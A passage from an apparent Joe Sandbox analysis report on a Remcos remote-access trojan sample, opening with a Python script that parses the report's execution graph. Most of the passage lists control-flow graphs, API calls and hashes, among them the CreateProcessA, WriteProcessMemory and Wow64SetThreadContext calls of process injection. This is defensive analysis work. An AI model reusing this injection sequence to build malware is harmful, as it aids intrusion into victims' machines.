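EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, [api, ...]),
    edges maps id -> set of successor ids.
    Grammar assumed from the listing: '<id> <hexaddr> [ApiName ...]' defines a
    node (ids are decimal, API names never are), '<id>-><id>' is an edge."""
    nodes, edges = {}, defaultdict(set)
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
        elif tok.isdigit():
            node_id, addr = int(tok), int(tokens[i + 1], 16)
            i += 2
            apis = []
            while i < len(tokens) and not tokens[i].isdigit() and not EDGE.match(tokens[i]):
                apis.append(tokens[i])
                i += 1
            nodes[node_id] = (addr, apis)
        else:
            i += 1          # the leading 'execution_graph' label
    return nodes, edges


def entry_nodes(nodes, edges):
    """Nodes that no edge points to: the graph's entry points."""
    targets = {t for succ in edges.values() for t in succ}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, start):
    """Depth-first walk collecting the API names on every node reachable from start;
    the visited set also terminates on self-loops such as 22272->22272."""
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(nodes.get(n, (0, []))[1])
        stack.extend(edges.get(n, ()))
    return apis


def api_report(text):
    """Map each entry node's address (hex) to the sorted APIs reachable from it."""
    nodes, edges = parse_graph(text)
    return {f"{nodes[e][0]:x}": sorted(reachable_apis(nodes, edges, e))
            for e in entry_nodes(nodes, edges)}


if __name__ == "__main__":
    for addr, apis in api_report(EXCERPT).items():
        print(addr, ", ".join(apis) or "(no API calls)")
```

Run against the full execution_graph line rather than the excerpt, the report gives the same answer the Execution Coverage figure hints at: only a handful of entry points in process 11 ever reach an API (CreateActCtxA, DuplicateHandle, GetModuleHandleW, PostMessageW, CloseHandle), which is consistent with this region being the .NET stub that hands off to the injected Remcos payload rather than the payload itself.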

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1bde34d5d564a2af4c404ac862ff1a46a930f2ae562b51c6b39c42967e1ce502
                                              • Instruction ID: de30a046f503927a742ee1eda0c484a5efbe39bdf1980f404c78c47cc84737b4
                                              • Opcode Fuzzy Hash: 1bde34d5d564a2af4c404ac862ff1a46a930f2ae562b51c6b39c42967e1ce502
                                              • Instruction Fuzzy Hash: 36713970A00B058FE724DF69D48479ABBF5FF48204F108A2DD49AD7B50DB75E889CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 60 16b58ec-16b58f3 61 16b58f8-16b59b9 CreateActCtxA 60->61 63 16b59bb-16b59c1 61->63 64 16b59c2-16b5a1c 61->64 63->64 71 16b5a2b-16b5a2f 64->71 72 16b5a1e-16b5a21 64->72 73 16b5a31-16b5a3d 71->73 74 16b5a40 71->74 72->71 73->74 76 16b5a41 74->76 76->76
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016B59A9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4a4e46910324f112cb8bf751db7f4956b7ef0860f3330972fd25174243d74295
                                              • Instruction ID: 42b8afc42b9345323afec065fb73d1595a521c9763cb0a35e9f2a4830ab11d09
                                              • Opcode Fuzzy Hash: 4a4e46910324f112cb8bf751db7f4956b7ef0860f3330972fd25174243d74295
                                              • Instruction Fuzzy Hash: E041BF70C00759CFDB24DFAAC884BDEBBB5BF49704F20806AD509AB251DB756945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 77 16b44b4-16b59b9 CreateActCtxA 80 16b59bb-16b59c1 77->80 81 16b59c2-16b5a1c 77->81 80->81 88 16b5a2b-16b5a2f 81->88 89 16b5a1e-16b5a21 81->89 90 16b5a31-16b5a3d 88->90 91 16b5a40 88->91 89->88 90->91 93 16b5a41 91->93 93->93
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016B59A9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: a5e033cad0422615106dd56f2761292eeb4dcec73ef919d3d0a1ccfb2306d2ed
                                              • Instruction ID: f2b2b74318e97e480fcb72f0acefcfaccc4becccb08602b0ac622f646ad0ba9d
                                              • Opcode Fuzzy Hash: a5e033cad0422615106dd56f2761292eeb4dcec73ef919d3d0a1ccfb2306d2ed
                                              • Instruction Fuzzy Hash: 2941BFB0C00769CBDB24DFAAC884BDEFBB5BF49704F20806AD509AB251DB756945CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 94 16bd1dc-16bd684 DuplicateHandle 96 16bd68d-16bd6aa 94->96 97 16bd686-16bd68c 94->97 97->96
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD5B6,?,?,?,?,?), ref: 016BD677
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 10f7dc9cbbca23717886377fd5f02d8a0936c1e1a9097a42180338f9a20c7c65
                                              • Instruction ID: 7a7ae8393f4ff8db156c413249eccdf95c9fae10f9443663d2e75d02fabfd29a
                                              • Opcode Fuzzy Hash: 10f7dc9cbbca23717886377fd5f02d8a0936c1e1a9097a42180338f9a20c7c65
                                              • Instruction Fuzzy Hash: 7421E5B5900259AFDB10CF9AD984ADEBBF4EB48314F14841AE918A7350D374A950CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 100 16bd5e8-16bd5eb 101 16bd5f0-16bd684 DuplicateHandle 100->101 102 16bd68d-16bd6aa 101->102 103 16bd686-16bd68c 101->103 103->102
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD5B6,?,?,?,?,?), ref: 016BD677
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: b1e2e694401ac1a87faf36b2213acd8ebb4fc0bb4e93bc8cea14616b092c6947
                                              • Instruction ID: a88173463f1a4ff05bf1f0f79331ad724f44ce6de1843afec48d4acc0372d052
                                              • Opcode Fuzzy Hash: b1e2e694401ac1a87faf36b2213acd8ebb4fc0bb4e93bc8cea14616b092c6947
                                              • Instruction Fuzzy Hash: 1E21E4B5900259EFDB10CF9AD984ADEFBF9FB48314F14801AE958A7350D378A940CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 106 16ba02c-16baf38 108 16baf3a-16baf3d 106->108 109 16baf40-16baf6b GetModuleHandleW 106->109 108->109 110 16baf6d-16baf73 109->110 111 16baf74-16baf88 109->111 110->111
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016BAD24), ref: 016BAF5E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d5f30d4978dda892145e85215c882b88595914136780722e66faaf84c7071a77
                                              • Instruction ID: c2b07fed3f5aef0d81871a31a843009318e6b9e5918890e0061a074ccde2333d
                                              • Opcode Fuzzy Hash: d5f30d4978dda892145e85215c882b88595914136780722e66faaf84c7071a77
                                              • Instruction Fuzzy Hash: B51132B5C003498FDB20CF9AD884BDEFBF8EB48214F10802AE518A7740D379A545CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 113 7534360-753880a PostMessageW 115 7538813-7538827 113->115 116 753880c-7538812 113->116 116->115
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 075387FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: fa3e437477641cde51deea7ed093aa69de8cbc74ca925d6a0ebbb9cf7ccf4a84
                                              • Instruction ID: 46a3860dfa74fb1c6579dff39cef0993578a21c32275653153277bdddd6fb84c
                                              • Opcode Fuzzy Hash: fa3e437477641cde51deea7ed093aa69de8cbc74ca925d6a0ebbb9cf7ccf4a84
                                              • Instruction Fuzzy Hash: 3111F5B58003499FDB20DF9AD484BDEFBF8FB48310F10885AE554A7650C379A944CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 118 753879a-753880a PostMessageW 119 7538813-7538827 118->119 120 753880c-7538812 118->120 120->119
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 075387FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: e5731a665d121e172f944b8b2f23ac318556ca67d3795f960780cf5aabd558bd
                                              • Instruction ID: ab48adc03a8d34e4d8a22b8f6b1159be78168ecb6dca1fc7720247ac003cd5a9
                                              • Opcode Fuzzy Hash: e5731a665d121e172f944b8b2f23ac318556ca67d3795f960780cf5aabd558bd
                                              • Instruction Fuzzy Hash: 1511D3B98003499FDB20DF9AD585BDEFBF8FB48310F20881AE558A7650C379A544CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 149 75392b4-7539f30 CloseHandle 151 7539f32-7539f3d 149->151 152 7539f46-7539f6e 151->152 153 7539f3f-7539f45 151->153 153->152
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07539D89,?,?), ref: 07539F30
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 5a8337e8c2c89225074c0e505c535d076398677e67e5304130aa1a1527343857
                                              • Instruction ID: 112321a9981a6827f858e5ddcee5ad07a4bd2f4d68d5ef92656b7238a5773531
                                              • Opcode Fuzzy Hash: 5a8337e8c2c89225074c0e505c535d076398677e67e5304130aa1a1527343857
                                              • Instruction Fuzzy Hash: 741155B18043499FCB20DF9AC484BDEBBF4FB48324F10846AE558A7740D378A944CFA4

                                              Control-flow Graph

                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07539D89,?,?), ref: 07539F30
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 36b2f0ed72dea88152871978034cf0735246b5227917c24443d3ad74bd2be409
                                              • Instruction ID: 15618c0cbd2357873a39bf11e824781c19760265b5796b56ff6672d44e40edd2
                                              • Opcode Fuzzy Hash: 36b2f0ed72dea88152871978034cf0735246b5227917c24443d3ad74bd2be409
                                              • Instruction Fuzzy Hash: D71155B58003499FCB20DF9AC484BDEBBF4EF48320F20845AE568A7640D378A545CFA4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69f667cf3744b15d7cd39b6144e2e6e7fe17c240b8c9cd9cba8b549926ceae91
                                              • Instruction ID: 80e2d46abd259107ea0809f0414cd912a86ab700be9b50bbf863d99d30cca6f6
                                              • Opcode Fuzzy Hash: 69f667cf3744b15d7cd39b6144e2e6e7fe17c240b8c9cd9cba8b549926ceae91
                                              • Instruction Fuzzy Hash: 35212472504208DFDF09DF44E9C0B56BB75FF84324F24C169D80A0B746C336E446CAA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1da0b0db46cbfeb3ca7926101df281161a5f3233425f51044cc68fe3c3fc52a6
                                              • Instruction ID: 22715534ed523906fa319450cc787ed849ea75aac8fc1f70a41d30063c212a86
                                              • Opcode Fuzzy Hash: 1da0b0db46cbfeb3ca7926101df281161a5f3233425f51044cc68fe3c3fc52a6
                                              • Instruction Fuzzy Hash: 82216471654308DFDB10DF64D8C0B26BB61FB88314F60C5ADD90A4B682C377D807CA62
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e7ac1388af973017e256f259fe45a9a6229705cc6d719e349918ffb514445e1
                                              • Instruction ID: 7586c5a2134ced46e60a02f2d8d0e41a68099597b3656a0776f69c3764b1139d
                                              • Opcode Fuzzy Hash: 2e7ac1388af973017e256f259fe45a9a6229705cc6d719e349918ffb514445e1
                                              • Instruction Fuzzy Hash: 35213471524308EFEB01DF94C9C0B26BBA5FB84324F64C5ADE90A4B693C376D806CA61
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19027add937eb6fcc6659b7c592322ff735ff463d0e3db1e8f8398594f6316b5
                                              • Instruction ID: 22f6b73d7d1ee573de56d01d6eaa384e56d763a64606908361e8d5b91cc10d04
                                              • Opcode Fuzzy Hash: 19027add937eb6fcc6659b7c592322ff735ff463d0e3db1e8f8398594f6316b5
                                              • Instruction Fuzzy Hash: 6321B0714483849FCB02CF64D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: f5e8f0683ebadff1fecd43f0c4d647622d704ce3e113fcc934860a9679ae19c8
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 8211CD72404244DFCF06CF44D5C0B56BF71FB84224F2482A9D80A0A656C33AE456CBA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 2adf91436038efa660fb3395d77cd129640c627cc7532ccaec3f2ec42a62207a
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: A011BB75504284DFDB02CF54C5C4B15BBA1FB84324F28C6AAD9494BAA7C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bce61906af7609ad2c55b3e7f8a5b91abcb62a48c090a9d3b84b0297e7513be
                                              • Instruction ID: cbc0daca9010fa7f9469798f06e51b975511ffa19a6c9fcf7d361706ca229999
                                              • Opcode Fuzzy Hash: 2bce61906af7609ad2c55b3e7f8a5b91abcb62a48c090a9d3b84b0297e7513be
                                              • Instruction Fuzzy Hash: 2E01A731104B889BEB185A99ED84B66FFA8DF41228F18855AED094A386C7799440C6B2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3305cfdd819d5e5c09e81cb68ef2dcdd6f73a3d6a169184ee67d88665aa3e1b2
                                              • Instruction ID: fd2b93c3126b713766b70e75f12a8a81840c4cb4d4b8ba47c94ef48061cff95e
                                              • Opcode Fuzzy Hash: 3305cfdd819d5e5c09e81cb68ef2dcdd6f73a3d6a169184ee67d88665aa3e1b2
                                              • Instruction Fuzzy Hash: 30F0C231004784AEEB148A0ADD84B62FFACEF40628F18C45AED084E386C3799840CBB1

                                              Execution Graph

                                              Execution Coverage:10.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:201
                                              Total number of Limit Nodes:7

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0141D01E
                                              • GetCurrentThread.KERNEL32 ref: 0141D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0141D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0141D0F1
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: b29ffdf44a7d9cdf87dced3ec2772619e87ffcd184397c009b43fdb091801c40
                                              • Instruction ID: d05f99f7ee54e74411478398cb7d3952479b06e813ec7a366bf643ba05756992
                                              • Opcode Fuzzy Hash: b29ffdf44a7d9cdf87dced3ec2772619e87ffcd184397c009b43fdb091801c40
                                              • Instruction Fuzzy Hash: 3B5167B0D017498FEB14CFA9D948BDEBFF1AF88314F20849AD419A73A0D7785944CB26

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0141D01E
                                              • GetCurrentThread.KERNEL32 ref: 0141D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0141D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0141D0F1
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7e0d440cab35f19a1e6896ffc30793db26a8cc70cf4a0d989d064ae0d877f7a0
                                              • Instruction ID: f2d629fb146840f618dfe3e5cb0f9031b9d3fc2f8c2c6bc92d3927c1e23e22ce
                                              • Opcode Fuzzy Hash: 7e0d440cab35f19a1e6896ffc30793db26a8cc70cf4a0d989d064ae0d877f7a0
                                              • Instruction Fuzzy Hash: E55178B0D017498FDB14CFAAD548BDEBBF1AF88314F20845AD418A73A0D7745944CF66

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07767CF6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: a1c42f1d7b8276e7fc1410277c71ff4af423f29202a5b3b2cad8f6b96cfeec4c
                                              • Instruction ID: c11ac8f6d901e87d133f5c02d6b446145dcacb5f6cd2b2db7f4b19f1f7facaa1
                                              • Opcode Fuzzy Hash: a1c42f1d7b8276e7fc1410277c71ff4af423f29202a5b3b2cad8f6b96cfeec4c
                                              • Instruction Fuzzy Hash: 44A17BB1D0031ACFEB24CF68C8457EEBBB2BF45394F148569E808A7244DB759985CF91

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07767CF6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 272f26b9f16520c314cb2554131201580fe22675d8f5128467680b148741441a
                                              • Instruction ID: 20e017b8ea1fa37799416fe2e61158a801c712d7c33d8296b2cdb988eb930fd6
                                              • Opcode Fuzzy Hash: 272f26b9f16520c314cb2554131201580fe22675d8f5128467680b148741441a
                                              • Instruction Fuzzy Hash: F8917CB1D0031ACFEB24CF68C845BEEBBB2BF45394F148569E808A7244DB759985CF91

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0141AF5E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 64b075c12deecec8e2192fed35c899372638a7ac6e96a6eadc48a95b8aed4414
                                              • Instruction ID: 75165a0f51336e5ba10635baa87aa1d1c814169531760c261bdc587bb084805f
                                              • Opcode Fuzzy Hash: 64b075c12deecec8e2192fed35c899372638a7ac6e96a6eadc48a95b8aed4414
                                              • Instruction Fuzzy Hash: 7E7147B0A01B458FE725DF2AD04075ABBF2FF48204F10892ED48AD7B54D775E849CB90

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 014159A9
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7ed78a08683671ce2db452d3e449d42fe54b5a74e8ac54fec3c9f0fd781b9f7f
                                              • Instruction ID: e693b6658657bc3cc8be892476f80230e5efa9fc551b976f060e03c93e78ab00
                                              • Opcode Fuzzy Hash: 7ed78a08683671ce2db452d3e449d42fe54b5a74e8ac54fec3c9f0fd781b9f7f
                                              • Instruction Fuzzy Hash: C341E370C10759CFEB24CFA9C8847DEBBB6BF89304F24806AD418AB255DB75594ACF50

                                              Control-flow Graph (figure): entry 014144B4, blocks 014144B4-01415A41; CreateActCtxA called in entry block 014144B4-014159B9; final block 01415A41 branches to itself
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 014159A9
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 1b89a78307d857af77741ffcd3258175d14ae1b1d5443beebb0a07f46d05ef93
                                              • Instruction ID: 8a3ab2e3977aa9e90c9975ad62dd85476cb0f4e2f5629f6a090ced0249a0339a
                                              • Opcode Fuzzy Hash: 1b89a78307d857af77741ffcd3258175d14ae1b1d5443beebb0a07f46d05ef93
                                              • Instruction Fuzzy Hash: 8E41D270C10719CFEB24DFAAC8447CEBBB5BF89304F20806AD418AB255DB756949CF90

                                              Control-flow Graph (figure): entry 07767830, blocks 07767830-0776790E; WriteProcessMemory called in block 07767896-077678D5
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077678C8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: bbe0200bae26ef9d133a816e7864056189eb265fd92bbef4402f86c7982f9596
                                              • Instruction ID: b24a9d5cfb1c6eb3c6aa6cd4eb05327834d3f17dcff4877f9467d3bebfbefb4d
                                              • Opcode Fuzzy Hash: bbe0200bae26ef9d133a816e7864056189eb265fd92bbef4402f86c7982f9596
                                              • Instruction Fuzzy Hash: 582137B590031A9FDB14CFA9C884BDEBBF5FF48354F108829E918A7240D7789944CBA0

                                              Control-flow Graph (figure): entry 07767838, blocks 07767838-0776790E; WriteProcessMemory called in block 07767896-077678D5
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077678C8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: b83a6e333444cf6434783596d8a04ad6bc0fdf4aeb1b9453309ae02281da496e
                                              • Instruction ID: 543725d2191457bff0c10ef44fa85153b4d6f64d08085bb03462b62a730ba2a6
                                              • Opcode Fuzzy Hash: b83a6e333444cf6434783596d8a04ad6bc0fdf4aeb1b9453309ae02281da496e
                                              • Instruction Fuzzy Hash: 00212AB590030A9FDB10CFA9C885BDEBBF5FF48310F148829E958A7240D7789944CFA1

                                              Control-flow Graph (figure): entry 07767698, blocks 07767698-07767764; Wow64SetThreadContext called in block 077676FB-0776772B
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0776771E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
